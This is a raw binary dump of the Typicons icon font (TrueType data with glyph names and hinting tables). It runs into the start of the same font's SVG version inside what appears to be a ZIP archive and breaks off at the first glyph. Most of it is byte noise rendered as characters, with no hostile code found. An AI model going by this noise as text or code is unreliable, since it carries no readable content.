	+?#"&/##"&'&7>26;&546;22+"'26'&"32?373264&+"264&+6&+";3�:9�$0$;_<$,?�<H<K I4�$<".d4II4�0w
�4�
�Y**s������ss� %  %0%1/M$$�#04I% F=�IhIS(N��(<<�""�"-"��,2��+7O@L	B	[		[ZOS
G.,41,7.7(&# ++"+%#"/#'.7623'#"&7#"&46;232%#"&46;2�
�!�6
_s:��ȧ�ȧ��TTn(<<!N�s��,
"-��"�""���&(<]��@�6	
c
B!
A		h

h	[	
	[[[
O
TH���|zwurpnlig_^ZYTRLJGD>=:953-+	((+2632632#"'+"'#"&=&'&6?64&#"3272652;264&+7654'&#"26542654'654&#"327632#"32"&54&"�%=B[^@;ZRt	�[>4$0�1##04I$!-:Q	
9	
"�.!��l`))'<;')"5pO+D/E!
	

,"&&@@DtR49[!!  I4�!/a
}!��#!.�3"`)9:)''):��O8;(%/D>)",82k�3^c@`
4	B
	
	h		h
[
	
	[OS
G[YRPMKHFCB>=980.('"!33+6"&5&'&6?6#"&?654&""&5476232%"&5462264&#"&463264&#".7632�"!S'M�� /")(u())`l:,OpP",

!!E/C2
!)��3� :)(():9)`"�):8OO8,"
!>D/%���&GMR@O;MKJHB:870$Bh[[[OSG)&#*#&"!	+7432#"#'#"&54767'4763262327676732654'/7&#"&'�)**)<5POpn=bVzJV[OPpWI"�|J3:%)74MnuhwMoB<<-X+q7�**)IWpPO�!JzV^AIApOP5"�3J-/JEoMsht	nM2-2'](o6����#+3@0!Bh[OSG+%$+#"'#"&547>7&5463276264&"�{V^(,C<V3/~zV	oPm	�	""AVz|/4U<C-(]Vz
	lOj	�S""���J.@+JBjjOSGBA%#+6&'&7>'.6765462#".47>'.7>'"&76{#UZ4R[�YP]	�[X�/2
�H�_=&���-/A?�LG7#sp;%4?>4@'4\>�P\W�V]�JKOO%��:a�GRfHPM�A?43�I/#'4K@(X-���+%@"+"Bjjja'%$+&7>73?6323/#"'&?�O#O�"#	4) %��
 )I,�!�D4
�-``
,����+:6@3:63+/"Bjjjja-,'%$+&7>73?6323/#"'&?2.5&?'&/�O#O�"#	4) %��
 )�	���GI,�!�D4
�-``
,�G	W"S3
t	���\y@
	?ja+63'&57&'&746376G	uK-_C

�6m��B*�\:

y��� 7$@!51-)%	Bja  +"/'&?.'&76?63276'&?'&/P��&!(b)�R$%Q�(�($��
��#��	HH
��J	aa(�X$$�%%�$%��/3T VV�v��v���x@
?a+762/&?&'&67�[[�X

�,�sM-bA

���

��mA,�Y<	��A�<v`@]RNJ2-)\A<#e	qlf
B		hO[
YSGvtjh*.-'+/#"/&/.?'&4?'&6?>76276&6?'&?'.///76327>7>?/M)\$S4

3S%])MM)]%S3/4S&\)[
88C< %% <C	
77
	C<
%%	<BO.3S%])MM)]$S3
,
3S$\)MM)\$S�	%% <C88C<	%%	<C87
	C���;>@;62-#
BOYSG870/('+/"/&/.?'&4?'&6?>76276�\

\1
oc>>cn
2]		]2
nc>>co

{>>cn

2]		]2
o
c>>c
o

1]		]1
o�b��&.?GO�@

BK�
PX@Fh
^	
	`[

	

[\[OSG@Hh

f	

	h[

	

[\[OSGY@MLIHEDA@=<3##3'+ &5467'5#"&46;2+?62264&"%32+"&=462&2"&4264&"�B����)�)}[#�J��NS}"�Γ�Γ��zz�z�^v��ܛ��)"")V#����"}}�Γ���{�zz�
����"-27?Gl@i;8/?<20.

GD753! 
C@6"B[[[OSGFEBA>=:9+)%$+  &4'$7&547'67'&'62764&#"%'7&"6227'"'�$����qPP�QQb%J;�$J;K0G1#"1,;J%$J;^:�:Q$�:�:P$�����$ӂ:P,P��:QP'%J;��'J;�0D11"�;J%�'J;�Q�oQ���y )�K�PX@1`	Y\
[MSG@2h	Y\
[MSGY@!!!)!)&$#" +2+#!"&546;5463!4&#!!32q#00#S1#��#01"*1"}w���_�%y1"�_#0*"11"w#1S"1��b
��}%��bk�
%-D@ABk[[OSG+*'&#"

+"'.2"/&/&47"264&2"&4$Wz=�$��:=��VW	��F�}UU�4%%4$iV==V=yz�=|�$'<=TVZ��D���}U�U�%4$$4N=V==V�8A�"/7?T@Q,%$BAk[[[OSG$)%*	+"'&'&547&7632	&#"7&#"632"264&2"&4)-��F�\U+ZUyzU{#��=VWz=\�-��=WV=EPx^4%%4$iV==V=�D-E���YUyRE�ZUU��$=z�=Y��-==#)�%4$$4N=V==V��A�#'7;KO�@}Y[

Y		M	S
		GLL=<88)($$LOLONMEB<K=J8;8;:91.(7)6$'$'&%#"	+2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#$"11"�#01"���"11"�#12"��"11"�"10#���"11"�"21#���1#�#00#�#1����$1#�#01"�#1���Ч0#�#11#�#0����#0#�#11#�"1��������/?*@'[OSG55555552+46;2+"&5%46;2+"&546;2+"&5%46;2+"&5I4S4II4S4I�I4S4II4S4I�_I4S4II4S4I�I4S4II4S4I&4II4S4II4S4II4S4II4��4II4S4II4S4II4S4II4��A�#/;GW[ko��@�"
	
[#		[ [![[OS
G��qpll]\XXIH=<20%$
������yvpq~lolonmeb\k]jX[X[ZYQNHWIVC@<G=F850;2;+($/%. ##
$+%!"3!264&'2#!"&463%!"3!264&'2#!"&463%!"3!264&'2#!"&4632+"&=4635#2+"&=4635#2+"&=4635#��#4II4��4II4#��#4II4��4II4#��#4II4��4II4�#01"T"10#TTT#00#T#00#TTT"10#T#01"TT2""SIhIIhI�""SIhIIhI�""TIhIIhI��1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS���%)-1s@p[

[
	[		[O[SG..**&&
.1.10/*-*-,+&)&)('!%$
+%2#!"&4632#!"&4632#!"&463424242�"11"��#12"$"11"��#11#$"11"��"21#�t�����\1#"11D2#1D11D1$1"#12D1����$��$����A�#/;Gs@p
	
[		[[[
[OSG=<20%$
C@<G=F850;2;+($/%. ##
+%!"3!264&'2#!"&463%!"3!264&'2#!"&463%!"3!264&'2#!"&463��G4II4��4II4G��G4II4��4II4G��G4II4��4II42""SIhIIhI�""SIhIIhI�""TIhIIhI����
'A@>[[OSG"'&
	+%2#!"&54632#!"&4632#!"&5463�"10#��#01"H#00#��#00#H#01"��"10#\1#"11"#1#1D11D1$1"#11#"1��A�#'7;KO_csw�������@�4 .("

Y5#/)!		[2,&Y3-'[0*$Y1+%M1+%S
G����������yxtted``QPLL=<88)($$�������������������������������~x�y�twtwvumjdser`c`cbaYVP_Q^LOLONMEB<K=J8;8;:91.(7)6$'$'&%#"	6+72+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#�#01"T"10#TTT#00#T#00#TTT"10#T#01"TTw#12"S"10#SSS#11#S#00#SSS"21#S#01"SSw"11"S#11#SSS"11"S#11#SSS"11"S#11#SS�1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS�_1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS�_1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS	���#)�@�
[	[OS
G$$$)$('%#"!

	+424242424242432#432#432#�����T�����Sihhiihhiihh`��$��$�����$��$�����$��$������!16@3.'B[[OSG+7"&54675462"&5474622654'4&"�$2D1$
}?{�z>VxV�hI>%4$?�,"21#,�

�?TV{{VU>L<VV<��I4F%t%%��%F4���y$GSQ@N#@	B[[[OSGRQLKFE42 $$	+2#"'"&547&'.?>?63264>76=4&'.#"726%54&"26G4II4=&"!=V>
�")
8PB�%�#
x6=+
�7
$""PI4�4I2"C6+==+LK= �3
) ��+F7�	"�
;bP

���Y��-8{��@�XP)DB	`Aa4	?hff
	
	h		f[[
[OSG||:9���}||�|�qoki\ZUSLJA@9{:{&$! +&/&767>7>?>632654/%26'&'&"567676&#"76&#".#"67>7654#"#"&5476"'&#"3276�-F,n% 	D9�:6z 
*6%
	#=7K"G7�>2
��+-+
dC	E�3[2	')1
	8DV:	I�CB�6
7R)2?d;K%71%�V
�"�$�%	xd	6�%T�"%!/ 6	


&����$0RF@C#8B[[O[SGNL>=%$)+#"&/#"&=4632>546226=4&"76'.'7654&"32?>�!)
8PB�%-4II4=&#!=V=
���""�7


#x6>+
�< �2
) I4�4I2#A6+>>+KK�����
;]U

+F7�"��aP'3@0&BjkOSG	+"/&547627>32"676&'&'$5$�%%#j#2�;"FK$�#�"
�)
�	!��!$�%34%##2�#yA��@M
�w 
�����#@Bja+"/&462>��)"�2DY�DD��$�D2X��W�.26I@F6153204/*$Bhf[OSG%%+#"/&67664/.7'&#"6?'77'3$$��&24%�$$}#k#�5B06��5B5$��������$i$��$%�$i$w##��"50B5��"5B5w���!������y'/7�K�PX@?`		h
[

[[		\OSG@@h		h
[

[[		\OSGY@5410-,32++"&46;2&"264$  &4&"2656"264$2"&4}}��A6�����"",�zz�z��Γ�Γ""��������6}�{�zz���В��GN"D7@4<3+# B[OSG+%"/"'&54?'&54762762%2654/7654&"'&"27GJf%NO#j#%%NN%%#j#ON#k#$$OO$�݉#��#��"

��

"�3J%NN##%34%NN%43%##NN##$45$NN$7�����

��

��2�'%@"BOSG+"/"'&4?'&4762762�llFllFllFllFDllDllDllDll��qy!+7CO[e@bY
[

	
[		O		S	GWVQPKJED?>9832-,*'$#!! +2#+"&5"&46;5463!2%!5!;262"&=462"&=462"&=462"&=4GaE�Ea)1###1��#*��1"�"1��
`


`


a
�"��EbbEM"*"11"****�6M��#111�

��

��

��

��b��3H@E&
B
j

h
f

O	\

T
H10-,"#$##"+%#!"&=!"&?#"&77>+3'&6;3235462���"��q'$*
$'��q-��-q�"L.}}.�*��_*}�..��.���b�/;?U@RB/(!@
Y[		YMSG00?>=<0;0;874321+*%$3+%#!"&=4?67&672?26=264/!'#"&=!5!��fS!��!T��#_"_#��EBE_IhI�H��\���%]!��!]%�#_��_#����4II4��}����5G@D0' @	
jhYOSG+)$#55!$3+%#!"&5434?6;#!'#532"/"&5#"'&4?��fT
��EBE��
T�_"_�����	�S��S�I`��`#��#��y'0<��.+	BK�
PX@5`[
\

	
[		O		S	G@6h[
\

	
[		O		S	GY@&21)(861<2<-,(0)0%$! 
+%#"&46;2"&=462"264&2"&4"27.'2#"&546��}""��hIIhIӬzz�z�;T<�;S:m��kp���""}���IhIIh�z�zz��]$%SeB!22!Be��y/J@G	O[O		[S
G	,+(&#!//
	+"&462"&546322+"&=#"&46;5462�z�zz�Vp��pm���S"SS"��zz�z�<2!BeeB!2w"TT"SS��y$0Y@V"B[
[[		O	S		G&%,*%0&0! $$

+%#"&46;2"264&2"&4"27.'2#"&546���/hIIhIӬzz�z�;T<�;S:m��kp���""MIhIIh�z�zz��]$%SeB!22!Be��y;@8O[OSG
+%#"&46;22"&42#"&546�����zz�z�m��kp���""�z�zz���eB!22!Be���y$J@GB[[	[OSG $$
+"264&2"&4"27.'2#"&546.hIIhIӬzz�z�;T<�;S:m��kp��&IhIIh�z�zz��]$%SeB!22!Be���y!@[OSG$%+2"&44632#"&��zz�z*�pm��kp�yz�zz��	BeeB!22����'2<HTn�@+#BAK�
PX@Cj^^k\	\
	
	
[
		S	G@Bjj^k\	\
	
	
[
		S	GY@)mkhgdc`_\ZWVPOJIDC>=9743/-)(''"!+&/&343632?6#!"56767"32654&"326542"&=4$2"&=4!+"&=#"&=#"&�&-5/%	%;�g(#�
��  a  �6�* S )i"26	5	%.8(!"

�������M��}}}}����4�K�
PX@2	B@K�PX@2	B@@2	B@YYK�
PX@ h_OSGK�PX@hOSG@ h_OSGYY@0.-+)(+&?'.'&"&#&'&'&'&7>7676332632C*t*l>3'
.B=G7!
 %;Tc13&&.
C:CC:��8XB)
>&(,-<0:L$I$#%%P����+9�K�
PX@'[	[[SGK�PX@&	O[[SG@'[	[[SGYY@,,,9,952('# 6
+#'&=46;272#%&=46+"=463767%6#!"=46$	�	�	>w		��5�	�	>w	���
�		��
)�	0��	&	���	��AP'0@E�@CB	A
.BK�PX@<

h`		[
[
YOSG@=

hh		[
[
YOSGY@"21)(	ED:71@2?-,(0)0!'	&"!+432#"276/+"&'5#"&=46326=#726=4&#!"3%52�)**)�0GG#"GF0SJfE}3JJ3�T��6qSV))*$@-�-@+2JE3/J3�3J��TT���d�TkP%@@=
B[O[SG#"
+2#"/#!"&5463!276264&"A
kI4�64II4�4Ik�4%%4$���54II4N4II45��$4$$4���-'0C^@[*)-.0(BO[[	[SG;932" ''
+2#"/.#"&=46326?62#"'62#"'&4764'&�//oO4II4No��%_##_%57O~#//

-/+�_+0JI4S4IJ��S}�	%	��4:/BA/

"@��qO&-;?Ea@^-'$B6,*C?5+DA@><
BjhfO[SG:831&&$*&'+#"/&'#"&4?.=46326?63276753275#"57Yq/o2i@"*I4No/A�7T��v#_%�(|TOO"q��+0Ji#@?&S4IJ*@w	%	XT6�Sve�f�0S�4��-$6P^gt@qa`dU	eTgB_AO	
	[[


[[[SGRQ87YWQ^R^LJEC?=7P8P&%+#"'&4764'&4627#"&4764'&4627"&47654'.62%2#"/.#"&=46326?62#"'e//

#_QQ88#_tt"[[#��//oO4II4No��%_##_%57Os/BA/

"@#GQrtQ#8�8"Hr��t#[��[#/+�_+0JI4S4IJ��S}�	%	��4���-'0M@J*)-.0(BO[[SG&$+2#"/.#"&=46326?6#"32'�//oO4II4Nof#_%%_�7O-/+�_+0JI4S4IJ�RSa�	%	��4��!�#/K@H'Bh[\OSG
.-#!
	+"3!26'&'2#!"'&76432#"&'&5462�'�#4�4"�&U2�2))d�c+*3�27667u9#%4$:,�f,@@,�,TU�eTKJJJU�U��7760�V9%%��!�%1@.B[[OSG%3+%#!"'&7632264&"654&"2763*)d�e)*3�2VU2�6%%6&�*<+:;�UJJJJU�UU�%6&&6++
����G�(4@H�@-*
 
	96	BK�PX@8
`[

[	\		[OSG@9

h[

[	\		[OSGY@FEBA?<8730,+&#
+"&=46232#7+"&=&47546;2!6254&+"5"';26&264&"$"*}SSI4�4ISSI4�4I��<�<��<�<�Ӭzz�{S)"�U�UX4II4XU�UX4II4L""L��L""Lez�zz����d(>Vl�@�	Bhhh

h[
[[

[[[	[

[O		\SGlkihfea`^][ZVUSRPOJIGFDC>=;:87"+2"'&"#"&547&547&547622764&""'&"2762227622764'&""'&"64&""'&"27622>fJ    %X�X,$43J    %Y�Y,u"'r'@�@"(p(@��
 
'r'@�@
 
'r'@��"(p(@�@"'r'@�0J30##10##04%XX$J30##01##03%YY�=#''@@#((@�"

''@@"

''@��#((@@#''@G-D�@�

h		hh

hhh

[[	
	[

[[OSG/.@?=<:95421.D/D)(&%#"--+%"'&""&47622762'"'&""&47622762'"'&""&47622762�[@(o(#@�@(o(#@Z[@(o(#@�@(o(#@Z[@(o(#@�@(o(#@@((#@@((#@�@((#@@((#@�@(("@@(("@AP,M@J"Bhf[OSG'% ,,
+%!"&5467546326%"3!264&#"'.#"q�6EbF7�gP�\�z�� 01#�4II4-\=Eb
bE:Yh�]K{[V{�2D1IhI
.<OaE2�8Ay#[\@Y1	F*
B	
	
h
	
f		[[[SG%$XVRPKIDB/-$[%[
+"&=462"&=462"&=462%"&5467546326&'&67>54&#"'.#"#"32/""��""e""��EbF7�gQ�[�UC)3I4-\=Eb
; 01#u����l���bE:Yg�\K|[FoC*4I
.<ObE21"#1"���P9@6B[OSG
+"/76/7632'3264&#"�637%QQ%763����^��^?!-cc.����T���j�����<Gb�@~	?A0 -B3Ajh

f

f[	[OTHIH>=^\WVUTQPNLHbIa=G>G9754(%
+'&6767>'76'.76#!"&5467547&663632'"67654&264&#""'.'"'"32)*)�v;#-}}!$��;v
6�<JzV�6EbF7"$Ln7UMn�, X#
==4II4!Z;Eb
; 01#�}}!$�;v
5��*)*<v;"��iBV{bE:Y2,>T?nM�"Z+=�!IhI&:LaE22D1��Ay5=EMX@U0)
7G?Bhf[OSG.,$"	55	+%"&463264&#"'.#"#"32#"&5467546326!7&7&'7&q4II4-\=Eb
; 01#EbF7�gQ�[�z��***�*)*�*)*2"IhI
.<ObE21"#1"bE:Yg�\K|[Vz}}!$7}}!$}}!$�������@�um
��~|fd\T
�K
�H�A7.,B



h

ffhf	
OY	SG��������xwkjNM*+%/"&/#"/#&?#"&4?&'#'.?'.76?'.>&47"&'&6?'.7>'&67667'&462'&6767627>7>#/76&264&"�6E.


)	#.E%

f=??=f6E.#-!)	!-#."E%

f>??>�V==V>�N=?	."

S!$S".	?>O
$
 O>?	."-c!$c-".	?
=N
$
=V==V�bAy5;^@[0)
67B;:98?hf[OSG.,$"	55	+%"&463264&#"'.#"'"32#"&5467546326%7'q4II4-\=Eb< 01#EbF7�gQ�[�z��>}�?}2"IhI
.<ObE41"#1"bE:Yg�\K|[Vz��=��<
��
�'/7?GOL@I9!	1)Bjk[OSGMLIHEDA@76'&+'&676&'&67&'76'.767'&6'&7>"&462&"264�)**�zz!#A*)*�zz!#��9t
6/t9"�9t
6/t9"Ӛoo�n�V>>V=yzz!#��***�zz!#@***=t9"�9t
6/t9"�9t
6�jo�oo��=V==V��A�(Xp@mBh
		h[[
	[		[OSG*)UTQNKHEB?=:963/-)X*X 
((+7"'.546754632&'.#"'"2++"2#"&46;264&+"&463!264&"&46u	.6F7�g\�\=Eb
; 0:4II4[I4�"4II4���"�S2:Yg�v[<OaE52")
	' lIhI4I""IhI""""�P/E@B	[[[OSG,+(%"
//
+2+#!"2#"&463!264&+"&463!264&"&46X4II4[I4��"4II4��"PIhI4I""IhI""""���G/?Z@W
		hh
[
	
[[OSG000?0?=<:954/.%+#"/.547676 264&">4'&"27623>4'& 2762�,�/"A-�
�m�
	&�i4$$4%�$C�C$5U�$s��t$4P�O`@,�2�
40'uu

$��$4%%4R$5CC5$v$5ss5$PP����jf
.>@;jjjjOSG-,*)	+.4762"'& &'&476$"&47>"'&"�E2E
!z��zDp,-p2��D2@��@2D1�1	0EF1yyCpOOpC2�2D@--@D211����%+1>@;BhYYOTH;#3%+32+"&46;57.54>7>3!2267!'!&'#�mR)�)Rm2��nS��
(��U��""��U/wA

Aw�G66`OXX����@h�@�df	Z	2
KYB1"0#)A

h[		[
Y[[

O

T
H_^VTQOEC?>##,+  &5463267&#"4>32>457'#"&46354&"4632#"&'&#"&='2654&'�6����w	! ',T�%=S'"'
))*""}*!H
I���]L%�����6#3
}"1)UH>STS
( %*)S"}e*#Z=$B�..y��yW�#,,����@i@f		:&B;%$Ahh	[		[[OTH?>#%
+  &%5&#"4>32>457'#"&46354&"54626�6�����*)K�/{S'"'
))*""	!< �����6�>7{STS
( %*)S"}#3
}"11���d.9Ac@`.1/
#
B[[
[
	
[		O		S	GA@=<53*)&$!
	
+2+"&=#"&46;5462#"/#"&46232654'264&"�

T
S

S
^&L61'd0*y���E)i��{�zz�V

S

S

S

S�&lM!c��y+01)h
K�{{�z���d/7Y@V/$	Bk

[[	[		O		S	G7632+*'%" 
+2+#"&=#"4;54632#"/#"&462$264&"�		T	TT	 
)&L67&^0+y����{�zz�VS	S*S	S�
+&lM&^��y.-��{{�z���d)1N@K!B[[[OSG10-,%#	+#"&46;2#"/#"&46232654'264&"��

�

&L61'd0*y���E)i��{�zz�,



�&lM!c��y/,1)h
K�{{�z���d!)G@DBk[[OSG)(%$
+2+"&463#"/#"&462$264&"�		�		�&L69$^0+y���	#	��{�zz�V�&lM&^��y.-	$	�{{�z���y"-5R@O%#B		[[[[OSG32(##
+"264&2"&44?&5462#"'#"7&'3276264&"�hIIhIŠaa�b�&^��y+0d'16�)h��zz�{�IhIIhra�bb��ol&_+0y���c!�)ig{�zz����y$,E@BBk[[[OSG##	+2#"'#"&476?&54264&"62"&4264&" �y+0a(36L%* άzz�{��aa�bshIIhIy��a#Ml%+ 0+y��{�zz��a�bb��IhIIh����_<����������  �Z����Ll!��G���G�����%����������%��q�G����tj@u���G���G��AA�����������������AL�%�?���G���������������������A���GGG�������l�������((,��AGAA���M33qG�2A�q�P|(��GG����GG���������������GG��A��qD��G���A�G��A�����G����e��"����w���G�i���q�I�����J���G�����k��\�A���kAA�AA�A����q��W�G�q��������Ak�q�33G�GAA��A�AA��j������(fdx�P��*^��`���6D�

��\
h�����
,�r��N�H�B�<����:�,���:�z�\�  T �!8!�""�"�#
#8#�#�$j$�%V%�&&&�'V'�(@))j)�**l*�+b+�,�-4-�.V.�/./�0P0�1X1�22|3 3�3�4>4�565�6(6�7�7�8B8�8�99�:T:�;�<X<�=v=�>�?F?�@�A:A�B0B�B�CC�C�DhEE�F|F�GlG�H\H�IvI�J�J�K�L(MN2N�O$OFO�O�P|P�QpQ�R8R�R�S:S�S�T0TfT�T�T�U(UVUtU�U�V6VbWWpXX�Y>Y~Y�Z6[�[�\<\�]@]�^6^�_"_�_�`:`�aNa�b^b�c�d:d�e4fg0g�hlh�iri�jRj�lFl�mtn$n�obo�pHp�p�q.q�r|s�t|t�u�v.v�wwfw�xfyTzz�z�{�|J}}`d��������Z���D����B����ЇN�"�ЉV�ƊX��t�������z���b������B�Ɣj��4��Z��Z��r��:���̚Л��&��B�؞r�D���*���>�2��R���H�"������:��R��N����� ���,����~��Q�lyn
	��"$&JHR�	4�	�	�	H�	6	�F	�(c) Stephen Hutchings 2012TypiconsBookFontForge 2.0 : Typicons : 27-7-2014TypiconsVersion 2.0.3 ; ttfautohint (v0.95) -l 8 -r 50 -G 200 -x 14 -w "G" -f -stypicons(c) Stephen Hutchings 2012TypiconsBookFontForge 2.0 : Typicons : 27-7-2014TypiconsVersion 2.0.3 ; ttfautohint (v0.95) -l 8 -r 50 -G 200 -x 14 -w "G" -f -stypicons��2Q	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQglyph1glyph2glyph0glyph3glyph4glyph5glyph6glyph7glyph8glyph9glyph10glyph11glyph12glyph13glyph14glyph15glyph16glyph17glyph18glyph19glyph20glyph21glyph22glyph23glyph24glyph25glyph26glyph27glyph28glyph29glyph30glyph31glyph32glyph33glyph34glyph35glyph36glyph37glyph38glyph39glyph40glyph41glyph42glyph43glyph44glyph45glyph46glyph47glyph48glyph49glyph50glyph51glyph52glyph53glyph54glyph55glyph56glyph57glyph58glyph59glyph60glyph61glyph62glyph63glyph64glyph65glyph66glyph67glyph68glyph69glyph70glyph71glyph72glyph73glyph74glyph75glyph76glyph77glyph78glyph79glyph80glyph81glyph82glyph83glyph84glyph85glyph86glyph87glyph88glyph89glyph90glyph91glyph92glyph93glyph94glyph95glyph96glyph97glyph98glyph99glyph100glyph101glyph102glyph103glyph104glyph105glyph106glyph107glyph108glyph109glyph110glyph111glyph112glyph113glyph114glyph115glyph116glyph117glyph118glyph119glyph120glyph121glyph122glyph123glyph124glyph125glyph126glyph127glyph128glyph129glyph130glyph131glyph132glyph133glyph134glyph135glyph136glyph137glyph138glyph139glyph140glyph141glyph142glyph143glyph144glyph145glyph146glyph147glyph148glyph149glyph150glyph151glyph152glyph153glyph154glyph155glyph156glyph157glyph158glyph159glyph160glyph161glyph162glyph163glyph164glyph165glyph166glyph167glyph168glyph169glyph170glyph171glyph172glyph173glyph174glyph175glyph176glyph177glyph178glyph179glyph180glyph181glyph182glyph183glyph184glyph185glyph186glyph187glyph188glyph189glyph190glyph191glyph192glyph193glyph194glyph195glyph196glyph197glyph198glyph199glyph200glyph201glyph202glyph203glyph204glyph205glyph206glyph207glyph208glyph209glyph210glyph211glyph212glyph213glyph214glyph215glyph216glyph217glyph218glyph219glyph220glyph221glyph222glyph223glyph224glyph225glyph226glyph227glyph228glyph229glyph230glyph231glyph232glyph233glyph234glyph235glyph236glyph237glyph238glyph239glyph240glyph241glyph242glyph243glyph244glyph245glyph246glyph247glyph248glyph249glyph250glyph251glyph252glyph253glyph254glyph255glyph256glyph257glyph258glyph259glyph260glyph261glyph262glyph263glyph264glyph265glyph266glyph267glyph268glyph269glyph270glyph271glyph272glyph273glyph274glyph275glyph276glyph277glyph278glyph279glyph280glyph281glyph282glyph283glyph284glyph285glyph286glyph287glyph288glyph289glyph290glyph291glyph292glyph293glyph294glyph295glyph296glyph297glyph298glyph299glyph300glyph301glyph302glyph303glyph304glyph305glyph306glyph307glyph308glyph309glyph310glyph311glyph312glyph313glyph314glyph315glyph316glyph317glyph318glyph319glyph320glyph321glyph322glyph323glyph324glyph325glyph326glyph327glyph328glyph329glyph330glyph331glyph332glyph333glyph334glyph335��22 � ��,� `f-�, d ��P�&Z�E[X!#!�X �PPX!�@Y �8PX!�8YY �
Ead�(PX!�
E �0PX!�0Y ��PX f ��a �
PX` � PX!�
` �6PX!�6``YYY�+YY#�PXeYY-�, E �%ad �CPX�#B�#B!!Y�`-�,#!#! d�bB �#B�
*! �C � ��+�0%�QX`PaRYX#Y! �@SX�+!�@Y#�PXeY-�,�C+�C`B-�,�#B# �#Ba��b�`�*-�,  E �Ec�Eb`D�`-�,  E �+#�%` E�#a d � PX!��0PX� �@YY#�PXeY�%#aDD�`-�,�E�aD-�	,�`  �	CJ�PX �	#BY�
CJ�RX �
#BY-�
, �b �c�#a�C` �` �#B#-�,KTX�DY$�
e#x-�,KQXKSX�DY!Y$�e#x-�
,�CUX�C�aB�
+Y�C�%B�	%B�
%B�# �%PX�C`�%B�� �#a�	*!#�a �#a�	*!�C`�%B�%a�	*!Y�	CG�
CG`��b �Ec�Eb`�#D�C�>�C`B-�,�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�	+-�,�+�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-� ,�+-�!,�+-�",�+-�#,�	+-�$, <�`-�%, `�
` C#�`C�%a�`�$*!-�&,�%+�%*-�',  G  �Ec�Eb`#a8# �UX G  �Ec�Eb`#a8!Y-�(,�ETX��'*�0"Y-�),�+�ETX��'*�0"Y-�*, 5�`-�+,�Ec�Eb�+�Ec�Eb�+��D>#8�**-�,, < G �Ec�Eb`�Ca8-�-,.<-�., < G �Ec�Eb`�Ca�Cc8-�/,�% . G�#B�%I��G#G#a Xb!Y�#B�.*-�0,��%�%G#G#a�E+e�.#  <�8-�1,��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# �C �#G#G#a#F`�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba#  �&#Fa8#�CF�%�CG#G#a` �C��b`# �+#�C`�+�%a�%��b�&a �%`d#�%`dPX!#!Y#  �&#Fa8Y-�2,�   �& .G#G#a#<8-�3,� �#B   F#G�+#a8-�4,��%�%G#G#a�TX. <#!�%�%G#G#a �%�%G#G#a�%�%I�%a�Ec# Xb!Yc�Eb`#.#  <�8#!Y-�5,� �C .G#G#a `� `f��b#  <�8-�6,# .F�%FRX <Y.�&+-�7,# .F�%FPX <Y.�&+-�8,# .F�%FRX <Y# .F�%FPX <Y.�&+-�9,�0+# .F�%FRX <Y.�&+-�:,�1+�  <�#B�8# .F�%FRX <Y.�&+�C.�&+-�;,��%�& .G#G#a�E+# < .#8�&+-�<,�%B��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# G�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba�%Fa8# <#8!  F#G�+#a8!Y�&+-�=,�0+.�&+-�>,�1+!#  <�#B#8�&+�C.�&+-�?,� G�#B�.�,*-�@,� G�#B�.�,*-�A,��-*-�B,�/*-�C,�E# . F�#a8�&+-�D,�#B�C+-�E,�<+-�F,�<+-�G,�<+-�H,�<+-�I,�=+-�J,�=+-�K,�=+-�L,�=+-�M,�9+-�N,�9+-�O,�9+-�P,�9+-�Q,�;+-�R,�;+-�S,�;+-�T,�;+-�U,�>+-�V,�>+-�W,�>+-�X,�>+-�Y,�:+-�Z,�:+-�[,�:+-�\,�:+-�],�2+.�&+-�^,�2+�6+-�_,�2+�7+-�`,��2+�8+-�a,�3+.�&+-�b,�3+�6+-�c,�3+�7+-�d,�3+�8+-�e,�4+.�&+-�f,�4+�6+-�g,�4+�7+-�h,�4+�8+-�i,�5+.�&+-�j,�5+�6+-�k,�5+�7+-�l,�5+�8+-�m,+�e�$Px�0-K��RX��Y�c �#D�#p�(	ERD�
*�D�$�QX�@�X�D�&�QX��X�DYYYY������DPK!��1�j�j�&it_sanctum/fonts/typicons/typicons.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
Created by FontForge 20120731 at Sun Jul 27 14:53:18 2014
 By Stephen Hutchings
(c) Stephen Hutchings 2012
</metadata>
<defs>
<font id="typicons" horiz-adv-x="750" >
  <font-face 
    font-family="Typicons"
    font-weight="400"
    font-stretch="normal"
    units-per-em="1000"
    panose-1="2 0 5 3 0 0 0 0 0 0"
    ascent="800"
    descent="-200"
    bbox="-1.5 -242 1001.45 800"
    underline-thickness="50"
    underline-position="-100"
    unicode-range="U+E000-E14F"
  />
<missing-glyph horiz-adv-x="364" 
d="M33 0v666h265v-666h-265zM66 33h199v600h-199v-600z" />
    <glyph glyph-name=".notdef" horiz-adv-x="364" 
d="M33 0v666h265v-666h-265zM66 33h199v600h-199v-600z" />
    <glyph glyph-name="glyph1" unicode="&#xe001;" horiz-adv-x="667" 
